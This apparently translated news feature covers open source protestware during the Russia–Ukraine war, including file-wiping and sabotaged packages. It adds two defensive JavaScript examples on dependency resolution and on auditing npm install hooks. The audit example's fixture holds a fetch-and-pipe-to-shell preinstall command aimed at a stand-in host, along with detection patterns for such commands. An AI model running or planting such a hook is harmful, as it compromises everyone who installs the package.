- Open source software has emerged as a proxy battleground for the armed conflict between Russia and Ukraine.
- This mirrors how the war is unfolding on the ground, and projects supporting Ukraine are being attacked.
- Some warn that the fallout from more aggressive tactics could damage critical Internet infrastructure.
After Russia invaded his country, Ukrainian developer Volodymyr Shymanskyy felt compelled to take action.
Already an active founder of and contributor to various open source projects, he built another site, called StandWithUkraine. The open source page, which has been viewed about 50,000 times, explains how to boycott IT companies operating in Russia, donate to Ukrainian organizations, and display a banner of support in other open source projects. The support banner was an immediate hit and has been installed in over 1,600 repositories.
Shortly after launch, however, the project was flooded with a swarm of GitHub issues calling it "random." The messages came from several different accounts and buried genuine feature requests and bug reports from users. Shymanskyy believes it was a coordinated attack by Russian developers or their allies, and he has spent hours blocking the accounts.
“We’re not going to turn a blind eye to this situation,” Shymanskyy told Insider. “The open source community will fight back.”
The same conflict is now playing out in the open source world as the war between Russia and Ukraine continues. From developers changing lines of open source code to display "no war" to more controversial tactics such as sabotaging software for users geolocated in Russia, open source has emerged as a proxy battleground for the conflict.
Some projects have served as an important source of hope and information, while others have caused spillover in the form of broken software. Now some community members warn that the fallout from more aggressive tactics could escalate and damage critical Internet infrastructure.
Avi Press, CEO of Scarf, an open source distribution tracking tool, said: "It is impossible to actually unravel and deal with the software used in society from the problems of that society. Open source is impossible to unravel from the world in which it is embedded and used."
Open source software has a long history as “protestware”
Anyone can use, download and modify open source software for free. As a result, projects are often built by a community of developers around the world. Because it is free and so widespread, much of the software you use today depends on a variety of open source projects to keep running. Startups of all sizes, and even the world's largest tech giants like Google and Meta, rely heavily on open source software.
This means that if open source becomes a battlefield, the stakes are high.
Open source as a venue for activism is nothing new. Open source developers have previously built protest into their code, including licenses that restrict use of the software by organizations that violate labor law or collaborate with Immigration and Customs Enforcement. One developer removed his open source code in protest against software company Chef's contract with ICE.
Tech Workers Coalition set up a cage at the entrance to the GitHub Universe conference in San Francisco to protest GitHub's contract with Immigration and Customs Enforcement.
Rosalie Chan / Business Insider
A quick search of GitHub, the go-to host for open source projects, turns up several repositories and discussions on open source activism, on topics ranging from police brutality to voter registration.
“I think open source as a whole was like a move to protest the practice of proprietary software,” Press said. “The OSS movement is a very political and activist idea. Open source has always taken many political positions in many ways.”
The proxy war reflects how the conflict is unfolding on the ground
Since the early days of the war, Ukraine has used the Russian army's lack of local navigational knowledge as a defensive tactic. In February, the government agency responsible for Ukraine's national highway system called on citizens and local governments to "start dismantling nearby road signs immediately." Ukraine's newly formed "IT Army" also tried to take Russia's GPS system offline.
At the same time, a group of developers was reviewing their open source projects to make sure they didn't inadvertently help Russian troops navigate the country.
OpenStreetMap is an international project aimed at creating a free, open map of the world, built by contributors adding information about the places where they live. But in light of the conflict, OpenStreetMap Ukraine urged contributors not to add mapping data about Ukraine, since it could be used for air and missile strikes and for rerouting military vehicles. Vitalii Hapontsev, an OpenStreetMap contributor, told Insider that both Russian and Ukrainian troops had used OpenStreetMap for military purposes in the past.
The project also tweeted last month that Russian residents who show allegiance to the Russian Federation should voluntarily resign from the project.
"Because we are Ukrainian citizens, it is in our true interest to minimize casualties and not provide assistance to our enemies, to bring us closer to victory," Hapontsev said. "But OSM is an international open source project with many applications, so you need to carefully consider your options."
OpenStreetMap contributor Oleksii Lutskyi feels that public contributions during the invasion "can be more harmful than good and should be avoided," but he hopes the project will be used for humanitarian purposes when Ukrainians resettle and rebuild their towns.
Developers are using open source software to raise awareness, but some efforts can cause widespread damage.
Just as the developers behind OpenStreetMap want the project to remain available, many people leveraging open source in the war are doing so to rally support.
For example, in Draw.io, the open source diagramming software used by customers of Atlassian's Confluence, some lines of code were replaced with "No War" in Ukrainian. Other projects, such as the EventSource and ECMAScript extensions, saw code changes that log Ukrainian and Russian flag emojis along with messages such as "Stop this meaningless war!" "The Ukrainian people are fully mobilized and ready to protect their country from the enemy," read another message.
Ukrainian software developer Oleksii Holub felt that coding is what he does best, so the best way for him to warn the world about the Russian invasion was through open source. He developed a Twitter and Reddit bot called Spelling Ukraine that tells people the correct Ukrainian spelling of geographic names instead of the Russian spelling.
Holub has also launched a website where people can search a database for the correct spellings. He says language is political because Russia denies that Ukraine has a language of its own. A wrong spelling is usually "not a bad thing," Holub said, but in the current situation it "damages Ukraine's existence."
In another recent example, Brandon Nozaki Miller, a developer who maintains open source JavaScript tools, modified the code of a project he maintains called "peacenotwar." But Miller took the protest a step further: the code also contained destructive code that wiped files from the disks of users geolocated in Russia and Belarus.
In a vacuum, it might have had little effect. But Miller added it as a dependency of other software packages, so it was pulled into every project that depended on those packages. Liran Tal, head of developer advocacy at cybersecurity firm Snyk, estimates the destructive code was downloaded about 3,000 times. Miller declined to comment for this story.
Some say more aggressive tactics create a spillover of software malfunctions that could be badly exacerbated
Miller's destructive code is an example of how a developer can exploit the web of dependencies among open source projects to distribute malicious code widely. Developers rely on dozens, if not hundreds, of these packages, and often download many of them at once.
But Miller's case is not unique, and it may actually be one of the less destructive examples. Earlier this year, Marak Squires, the developer of the JavaScript libraries Colors.js and Faker.js, deliberately sabotaged the code to protest its use by large companies, sending developers who depended on the libraries scrambling to fix their code.
These incidents show how much leverage maintainers have over the software and how that leverage can be used for protest, Press said. Putting a banner on a page is one thing, but some open source protests can take down infrastructure entirely.
“They can make that choice, basically just put the code in a package and millions of devices have it overnight,” Press said. “The trust we put in the maintainers, it’s already there and it’s really hard to get it back.”
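Both the peacenotwar incident and the Colors.js/Faker.js incident rely on the same mechanism: a project declares a dependency with a version range, and the next release the maintainer publishes within that range is installed automatically, whether or not the project's author ever looks at it. The following is an added example, not code from the article or from any of the packages it names, that models that mechanism with a simplified semver matcher (exact, caret and tilde ranges only; prereleases are not handled). The package names, versions and the in-memory "registry" are constructed for the example.

```javascript
// Added example: how a version range admits a maintainer's new release overnight,
// and how a transitive dependency reaches the root project. Package names,
// versions and the registry below are constructed; they are not real packages.

function parseVersion(v) {
  const [major, minor, patch] = v.split(".").map(Number);
  return { major, minor, patch };
}

function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  return pa.major - pb.major || pa.minor - pb.minor || pa.patch - pb.patch;
}

// Exact versions, caret (^) and tilde (~) ranges: the forms that cover most
// package.json dependency fields. Prereleases (1.2.3-beta) are out of scope.
function satisfies(version, range) {
  if (/^\d+\.\d+\.\d+$/.test(range)) return version === range;
  const op = range[0];
  const base = range.slice(1);
  const v = parseVersion(version), b = parseVersion(base);
  if (compareVersions(version, base) < 0) return false;
  if (op === "^") {
    // ^1.2.3 := >=1.2.3 <2.0.0 ; ^0.2.3 := >=0.2.3 <0.3.0 ; ^0.0.3 := =0.0.3
    if (b.major > 0) return v.major === b.major;
    if (b.minor > 0) return v.major === 0 && v.minor === b.minor;
    return version === base;
  }
  if (op === "~") {
    // ~1.2.3 := >=1.2.3 <1.3.0
    return v.major === b.major && v.minor === b.minor;
  }
  throw new Error(`unsupported range: ${range}`);
}

// Pick the highest published version that satisfies the range, as an installer
// with no lockfile would.
function resolve(registry, name, range) {
  const candidates = (registry[name] || []).filter((v) => satisfies(v, range));
  if (candidates.length === 0) return null;
  return candidates.sort(compareVersions).pop();
}

// Walk the dependency graph from the root and return every install path
// (root -> ... -> target) through which `target` is pulled in.
function pathsTo(manifests, registry, target, name = "root", trail = ["root"], out = []) {
  const deps = (manifests[name] && manifests[name].dependencies) || {};
  for (const [dep, range] of Object.entries(deps)) {
    const version = resolve(registry, dep, range);
    const next = [...trail, `${dep}@${version}`];
    if (dep === target) out.push(next.join(" -> "));
    pathsTo(manifests, registry, target, dep, next, out);
  }
  return out;
}

// Constructed data: the app depends on a CLI tool, which depends on a utility library.
const manifests = {
  root: { dependencies: { "example-cli": "^2.0.0" } },
  "example-cli": { dependencies: { "example-utils": "^1.4.0" } },
};
const registryBefore = { "example-cli": ["2.0.0", "2.1.0"], "example-utils": ["1.4.0", "1.4.1"] };
// The utility library's maintainer publishes a new patch release overnight.
const registryAfter = { ...registryBefore, "example-utils": ["1.4.0", "1.4.1", "1.4.2"] };

console.log(resolve(registryBefore, "example-utils", "^1.4.0")); // 1.4.1
console.log(resolve(registryAfter, "example-utils", "^1.4.0"));  // 1.4.2, picked up automatically
console.log(resolve(registryAfter, "example-utils", "1.4.1"));   // 1.4.1, an exact pin holds
console.log(pathsTo(manifests, registryAfter, "example-utils")); // root -> example-cli@2.1.0 -> example-utils@1.4.2
```

The app never declared example-utils at all; it arrives through example-cli, and the caret range lets 1.4.2 replace 1.4.1 on the next install with no change to either manifest. A committed lockfile installed with `npm ci` freezes the resolved versions, which is the practical defence against a maintainer's surprise release; it does not help when the pinned version itself is the sabotaged one, which is what code review of dependency updates is for.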
This is becoming a new trend in open source activism, Tal said, adding that his company, Snyk, is monitoring it closely.
Snyk co-founders Assaf Hefetz and Guy Podjarny, CEO Peter McKay, and co-founder Danny Grander.
Snyk
Beyond the ubiquity of open source software itself, the widespread use of these distribution channels opens up risks of its own. Last October, a popular JavaScript library was compromised and modified to install a malicious package that ran crypto miners, causing a major headache for many developers. Over 1,000 packages depend on the tool, and developers downloaded it nearly 10 million times in the second week of April.
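A compromised package does not need anyone to call it: npm runs a package's install-time lifecycle scripts (preinstall, install, postinstall) automatically during `npm install`, with the installing user's privileges, which is why those hooks are a common place for a hijacked package to put its payload. The following is an added example, not the article's code and not the code of the library it refers to, that audits a set of package manifests for such hooks and flags commands that fetch from the network or pipe into a shell. The manifests, package names and the host `example.invalid` are constructed for the example.

```javascript
// Added example: audit package.json manifests for install-time lifecycle scripts.
// The manifests below are constructed; the package names and host are fictional.

// Hooks npm runs without the installing project ever importing the package.
// `prepare` also runs for git dependencies and local installs.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Patterns a reviewer would want to look at first. These are heuristics, not
// proof of malice: many legitimate packages download prebuilt binaries on install.
const SUSPICIOUS = [
  { label: "network fetch", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { label: "inline script execution", re: /\bnode\s+-e\b|\beval\b|\bpowershell\b/i },
  { label: "pipe to shell", re: /\|\s*(sh|bash)\b/ },
  { label: "temp or dotfile path", re: /\/tmp\/|%TEMP%|\.\w+rc\b/ },
];

// Return one finding per install hook declared in a manifest.
function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = scripts[hook];
    const reasons = SUSPICIOUS.filter(({ re }) => re.test(command)).map(({ label }) => label);
    findings.push({
      name: manifest.name,
      version: manifest.version,
      hook,
      command,
      severity: reasons.length ? "high" : "review",
      reasons,
    });
  }
  return findings;
}

// Audit every manifest and put "high" findings first.
function auditAll(manifests) {
  return manifests
    .flatMap(auditManifest)
    .sort((a, b) => Number(b.severity === "high") - Number(a.severity === "high"));
}

// Constructed manifests: one clean, one legitimate native build, one that pulls
// and runs a remote script at install time.
const manifests = [
  { name: "tidy-strings", version: "3.2.0", scripts: { test: "node test.js" } },
  { name: "native-hash", version: "1.0.4", scripts: { install: "node-gyp rebuild" } },
  { name: "example-parser", version: "0.7.29",
    scripts: { preinstall: "curl -s http://example.invalid/loader.sh | sh" } },
];

for (const f of auditAll(manifests)) {
  console.log(`[${f.severity}] ${f.name}@${f.version} ${f.hook}: ${f.command}`
    + (f.reasons.length ? `  (${f.reasons.join(", ")})` : ""));
}
```

Run against a real tree, the manifest list would come from reading each `node_modules/*/package.json` (or the lockfile) before installation. The blunt mitigation is `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) in CI and on developer machines, then running the few build scripts you actually need by hand; that removes the install hook as a vector entirely, at the cost of native modules that genuinely need a build step.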
“It will be difficult to find a domain that is not affected by open source,” Press said. “It was bad, but it could be worse. I was lucky that it was just cryptocurrency mining.”
Tech platforms have to take their own positions
Individuals are driving the weaponization of open source in this conflict, but tech companies and the wider geopolitical situation itself also have a direct impact.
Sanctions imposed on Russia around the world apply to open source as well. And while individual maintainers control the code, the tools that make it easy to download and use are owned by large private companies, which gives them a say in how "open" open source should be during a war.
GitHub has suspended the accounts of Russian developers connected to companies sanctioned by the US government. Other companies are going further than the sanctions require. HashiCorp, for example, blocked access to its widely used open source tool Terraform in Belarus and Russia in late February.
Anaconda Co-Founder and Chief Executive Officer Peter Wang.
Anaconda
Anaconda, another large software distribution platform, has instead chosen to keep access to its Python packages open in Russia, maintaining an open channel for software distribution.
These companies' decisions reflect deliberations taking place throughout the open source community, which is debating what role maintainers should play, the ethics of the different approaches, and what stance open source companies should take.
“We strive to be the infrastructure of the community,” said Peter Wang, CEO of Anaconda. “When we take action, we have a lot of power, but it brings a lot of responsibility.”